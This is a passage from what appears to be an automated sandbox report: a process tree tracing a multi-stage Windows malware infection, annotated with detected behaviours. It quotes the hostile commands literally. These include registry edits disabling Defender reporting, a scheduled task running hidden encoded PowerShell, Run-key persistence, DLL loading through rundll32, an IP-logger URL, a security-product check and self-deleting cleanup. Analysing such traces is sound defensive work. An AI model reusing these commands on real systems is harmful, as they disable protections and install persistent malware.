                                                                          PID:2844
                                                                        • \??\c:\windows\SysWOW64\reg.exe
                                                                          REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                                                                          14⤵
                                                                            PID:5548
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /CREATE /TN "gpqMyinlc" /SC once /ST 06:17:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                                        12⤵
                                                                        • Creates scheduled task(s)
                                                                        PID:4044
                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                        schtasks /run /I /tn "gpqMyinlc"
                                                                        12⤵
                                                                          PID:4352
                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                          schtasks /DELETE /F /TN "gpqMyinlc"
                                                                          12⤵
                                                                            PID:5428
                                                                            • C:\Windows\System32\Conhost.exe
                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              13⤵
                                                                                PID:4352
                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                              schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 18:23:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\ldSVNmI.exe\" j6 /site_id 525403 /S" /V1 /F
                                                                              12⤵
                                                                              • Drops file in Windows directory
                                                                              • Creates scheduled task(s)
                                                                              PID:4488
                                                                      • C:\Users\Admin\Pictures\Adobe Films\Q9_E6thG7mij2_I43zmvk8Rh.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\Q9_E6thG7mij2_I43zmvk8Rh.exe"
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        • Checks SCSI registry key(s)
                                                                        • Suspicious behavior: MapViewOfSection
                                                                        PID:4132
                                                                      • C:\Users\Admin\Pictures\Adobe Films\6LMUTF51wzLnUCA_NSsUzVYC.exe
                                                                        "C:\Users\Admin\Pictures\Adobe Films\6LMUTF51wzLnUCA_NSsUzVYC.exe"
                                                                        9⤵
                                                                        • Executes dropped EXE
                                                                        • Checks computer location settings
                                                                        PID:4740
                                                                        • C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr1649.exe"
                                                                          10⤵
                                                                          • Executes dropped EXE
                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                          PID:1848
                                                                          • C:\Users\Admin\AppData\Local\Temp\82E1H.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\82E1H.exe"
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:5596
                                                                          • C:\Users\Admin\AppData\Local\Temp\HLA0C.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\HLA0C.exe"
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:5892
                                                                          • C:\Users\Admin\AppData\Local\Temp\D0826.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\D0826.exe"
                                                                            11⤵
                                                                            • Executes dropped EXE
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:6060
                                                                          • C:\Users\Admin\AppData\Local\Temp\8860B.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\8860B.exe"
                                                                            11⤵
                                                                            • Adds Run key to start application
                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                            PID:5252
                                                                          • C:\Users\Admin\AppData\Local\Temp\4A4I5.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\4A4I5.exe"
                                                                            11⤵
                                                                              PID:1448
                                                                              • C:\Windows\SysWOW64\control.exe
                                                                                "C:\Windows\System32\control.exe" .\HSCN.H
                                                                                12⤵
                                                                                  PID:5332
                                                                                  • C:\Windows\SysWOW64\rundll32.exe
                                                                                    "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\HSCN.H
                                                                                    13⤵
                                                                                    • Blocklisted process makes network request
                                                                                    • Executes dropped EXE
                                                                                    • Checks computer location settings
                                                                                    • Loads dropped DLL
                                                                                    PID:5388
                                                                                    • C:\Windows\system32\RunDll32.exe
                                                                                      C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\HSCN.H
                                                                                      14⤵
                                                                                        PID:5768
                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                          "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\HSCN.H
                                                                                          15⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:3696
                                                                                • C:\Users\Admin\AppData\Local\Temp\LI3FA3IG15M57IM.exe
                                                                                  https://iplogger.org/1QuEf7
                                                                                  11⤵
                                                                                  • Modifies Internet Explorer settings
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:1472
                                                                              • C:\Users\Admin\AppData\Local\Temp\pub1.exe
                                                                                "C:\Users\Admin\AppData\Local\Temp\pub1.exe"
                                                                                10⤵
                                                                                  PID:1708
                                                                                • C:\Users\Admin\AppData\Local\Temp\zhangyan.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\zhangyan.exe"
                                                                                  10⤵
                                                                                  • Executes dropped EXE
                                                                                  • Checks computer location settings
                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                  PID:4092
                                                                                  • C:\Users\Admin\AppData\Local\Temp\zhangyan.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\zhangyan.exe" -h
                                                                                    11⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                    PID:5732
                                                                                • C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
                                                                                  10⤵
                                                                                    PID:5388
                                                                                    • C:\Users\Admin\AppData\Local\Temp\a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\a1758ed0-2ffb-4d6c-b693-e91a0ab69bdf7906170.exe"
                                                                                      11⤵
                                                                                      • Checks processor information in registry
                                                                                      PID:5568
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7929_1647444188_3653.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7929_1647444188_3653.exe"
                                                                                    10⤵
                                                                                    • Executes dropped EXE
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    PID:5488
                                                                                  • C:\Users\Admin\AppData\Local\Temp\siww1049.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
                                                                                    10⤵
                                                                                      PID:5740
                                                                                      • C:\Windows\system32\WerFault.exe
                                                                                        C:\Windows\system32\WerFault.exe -u -p 5740 -s 268
                                                                                        11⤵
                                                                                        • Program crash
                                                                                        PID:5956
                                                                                    • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                      "C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                      10⤵
                                                                                        PID:5932
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-25TFO.tmp\setup.tmp
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-25TFO.tmp\setup.tmp" /SL5="$D004E,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
                                                                                          11⤵
                                                                                          • Checks computer location settings
                                                                                          • Loads dropped DLL
                                                                                          PID:2988
                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                            12⤵
                                                                                              PID:5560
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-A7S3K.tmp\setup.tmp
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-A7S3K.tmp\setup.tmp" /SL5="$1903C6,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
                                                                                                13⤵
                                                                                                • Loads dropped DLL
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5096
                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-KSM7G.tmp\nthost.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-KSM7G.tmp\nthost.exe" 81
                                                                                                  14⤵
                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                  PID:6052
                                                                                        • C:\Users\Admin\AppData\Local\Temp\inst200.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\inst200.exe"
                                                                                          10⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:6124
                                                                                        • C:\Users\Admin\AppData\Local\Temp\udontsay.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
                                                                                          10⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:2188
                                                                                        • C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
                                                                                          10⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1760
                                                                                          • C:\Users\Admin\AppData\Local\Temp\pK26geiEDlpwB\Soft706.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\pK26geiEDlpwB\Soft706.exe
                                                                                            11⤵
                                                                                            • Loads dropped DLL
                                                                                            • Adds Run key to start application
                                                                                            PID:3880
                                                                                            • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" "--B4lBeMRI"
                                                                                              12⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:2548
                                                                                              • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Routes\Routes.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Routes\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Routes\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Routes\User Data" --annotation=plat=Win64 --annotation=prod=Routes --annotation=ver=0.0.13 --initial-client-data=0x22c,0x230,0x234,0x208,0x238,0x7ffc0af8dec0,0x7ffc0af8ded0,0x7ffc0af8dee0
                                                                                                13⤵
                                                                                                  PID:1900
                                                                                                • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                  "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=1772 /prefetch:8
                                                                                                  13⤵
                                                                                                    PID:1936
                                                                                                  • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1660 /prefetch:2
                                                                                                    13⤵
                                                                                                      PID:5180
                                                                                                    • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=2020 /prefetch:8
                                                                                                      13⤵
                                                                                                        PID:2232
                                                                                                      • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2500 /prefetch:1
                                                                                                        13⤵
                                                                                                          PID:5936
                                                                                                        • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Routes\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2580 /prefetch:1
                                                                                                          13⤵
                                                                                                            PID:5208
                                                                                                          • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=gpu-process --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3168 /prefetch:2
                                                                                                            13⤵
                                                                                                              PID:1484
                                                                                                            • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                              "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=3268 /prefetch:8
                                                                                                              13⤵
                                                                                                                PID:5132
                                                                                                              • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                                "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=516 /prefetch:8
                                                                                                                13⤵
                                                                                                                  PID:3416
                                                                                                                • C:\Users\Admin\AppData\Roaming\Routes\Routes.exe
                                                                                                                  "C:\Users\Admin\AppData\Roaming\Routes\Routes.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,16191365479446224164,7066674485698403157,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Routes\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2548_1167705005" --mojo-platform-channel-handle=480 /prefetch:8
                                                                                                                  13⤵
                                                                                                                    PID:660
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
                                                                                                              10⤵
                                                                                                                PID:5544
                                                                                                                • C:\Windows\SysWOW64\control.exe
                                                                                                                  "C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
                                                                                                                  11⤵
                                                                                                                    PID:4896
                                                                                                                    • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                      "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
                                                                                                                      12⤵
                                                                                                                        PID:5564
                                                                                                                        • C:\Windows\system32\RunDll32.exe
                                                                                                                          C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
                                                                                                                          13⤵
                                                                                                                            PID:4488
                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                              "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\RWaYI_W.cpl",
                                                                                                                              14⤵
                                                                                                                              • Loads dropped DLL
                                                                                                                              PID:5304
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\anytime1.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
                                                                                                                      10⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      PID:4776
                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                        11⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Checks computer location settings
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:1692
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\win.exe"
                                                                                                                          12⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Loads dropped DLL
                                                                                                                          PID:5564
                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 19
                                                                                                                            13⤵
                                                                                                                              PID:5508
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                              C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                              13⤵
                                                                                                                                PID:3416
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                                C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                                13⤵
                                                                                                                                • Checks computer location settings
                                                                                                                                • Modifies registry class
                                                                                                                                PID:5544
                                                                                                                                • C:\Windows\system32\WerFault.exe
                                                                                                                                  C:\Windows\system32\WerFault.exe -u -p 5544 -s 128
                                                                                                                                  14⤵
                                                                                                                                  • Program crash
                                                                                                                                  PID:2676
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\anytime2.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
                                                                                                                          10⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          PID:3280
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
                                                                                                                            11⤵
                                                                                                                            • Checks computer location settings
                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                            PID:5468
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\win.exe"
                                                                                                                              12⤵
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:1344
                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Start-Sleep -s 19
                                                                                                                                13⤵
                                                                                                                                  PID:2752
                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\win.exe
                                                                                                                                  13⤵
                                                                                                                                    PID:5404
                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                      C:\Windows\system32\WerFault.exe -u -p 5404 -s 124
                                                                                                                                      14⤵
                                                                                                                                      • Program crash
                                                                                                                                      PID:4440
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\anytime3.exe
                                                                                                                              "C:\Users\Admin\AppData\Local\Temp\anytime3.exe"
                                                                                                                              10⤵
                                                                                                                                PID:4544
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
                                                                                                                                10⤵
                                                                                                                                  PID:1388
                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                    C:\Windows\system32\WerFault.exe -u -p 1388 -s 1688
                                                                                                                                    11⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:2720
                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe
                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe"
                                                                                                                            7⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Checks computer location settings
                                                                                                                            • Loads dropped DLL
                                                                                                                            • Checks processor information in registry
                                                                                                                            PID:932
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\System32\cmd.exe" /c taskkill /im IYEx72bTlmcph7YqkziCwtDG.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\IYEx72bTlmcph7YqkziCwtDG.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                              8⤵
                                                                                                                                PID:1056
                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                  taskkill /im IYEx72bTlmcph7YqkziCwtDG.exe /f
                                                                                                                                  9⤵
                                                                                                                                  • Kills process with taskkill
                                                                                                                                  PID:5404
                                                                                                                                • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                  timeout /t 6
                                                                                                                                  9⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:1816
                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\eMd30NO5w6CXpLgXXFSPbQav.exe
                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\eMd30NO5w6CXpLgXXFSPbQav.exe"
                                                                                                                              7⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Checks computer location settings
                                                                                                                              PID:1140
                                                                                                                              • C:\Windows\SysWOW64\svchost.exe
                                                                                                                                "C:\Windows\System32\svchost.exe"
                                                                                                                                8⤵
                                                                                                                                  PID:1636
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
                                                                                                                                  8⤵
                                                                                                                                    PID:2172
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd
                                                                                                                                      9⤵
                                                                                                                                        PID:2748
                                                                                                                                        • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                          tasklist /FI "imagename eq BullGuardCore.exe"
                                                                                                                                          10⤵
                                                                                                                                          • Enumerates processes with tasklist
                                                                                                                                          PID:620
                                                                                                                                        • C:\Windows\SysWOW64\find.exe
                                                                                                                                          find /I /N "bullguardcore.exe"
                                                                                                                                          10⤵
                                                                                                                                            PID:4956
                                                                                                                                          • C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                            tasklist /FI "imagename eq PSUAService.exe"
                                                                                                                                            10⤵
                                                                                                                                            • Enumerates processes with tasklist
                                                                                                                                            PID:4796
                                                                                                                                          • C:\Windows\SysWOW64\find.exe
                                                                                                                                            find /I /N "psuaservice.exe"
                                                                                                                                            10⤵
                                                                                                                                              PID:3872
                                                                                                                                            • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                              findstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla
                                                                                                                                              10⤵
                                                                                                                                                PID:4952
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pif
                                                                                                                                                Sta.exe.pif V
                                                                                                                                                10⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                PID:5224
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\C3TEUj3w0my3sG6vseSS1ODk.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\C3TEUj3w0my3sG6vseSS1ODk.exe"
                                                                                                                                          7⤵
                                                                                                                                          • Executes dropped EXE
                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                          PID:5068
                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\d7FUmlKnk_qRsOdIAuaf_SlZ.exe
                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\d7FUmlKnk_qRsOdIAuaf_SlZ.exe"
                                                                                                                                          7⤵
                                                                                                                                            PID:4992
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\fN_PuiaPiDkjEZnsupuHGsck.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\fN_PuiaPiDkjEZnsupuHGsck.exe"
                                                                                                                                            7⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            PID:4400
                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe
                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:1692
                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe
                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\f3t_lQbSoGh1nC6Koq2DOK1A.exe"
                                                                                                                                                8⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4892
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4892 -s 536
                                                                                                                                                  9⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:1704
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\X6dtQACQioqiebfEUtPmI4ox.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\X6dtQACQioqiebfEUtPmI4ox.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4880
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 464
                                                                                                                                                8⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:1576
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4880 -s 484
                                                                                                                                                8⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:1208
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\EeyZAYeCN3aiMcSvuVipi9sT.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\EeyZAYeCN3aiMcSvuVipi9sT.exe"
                                                                                                                                              7⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4964
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 464
                                                                                                                                                8⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:4140
                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4964 -s 472
                                                                                                                                                8⤵
                                                                                                                                                • Program crash
                                                                                                                                                PID:2512
                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\mMCADPue24qpppaQrsAjgFjD.exe
                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\mMCADPue24qpppaQrsAjgFjD.exe"
                                                                                                                                              7⤵
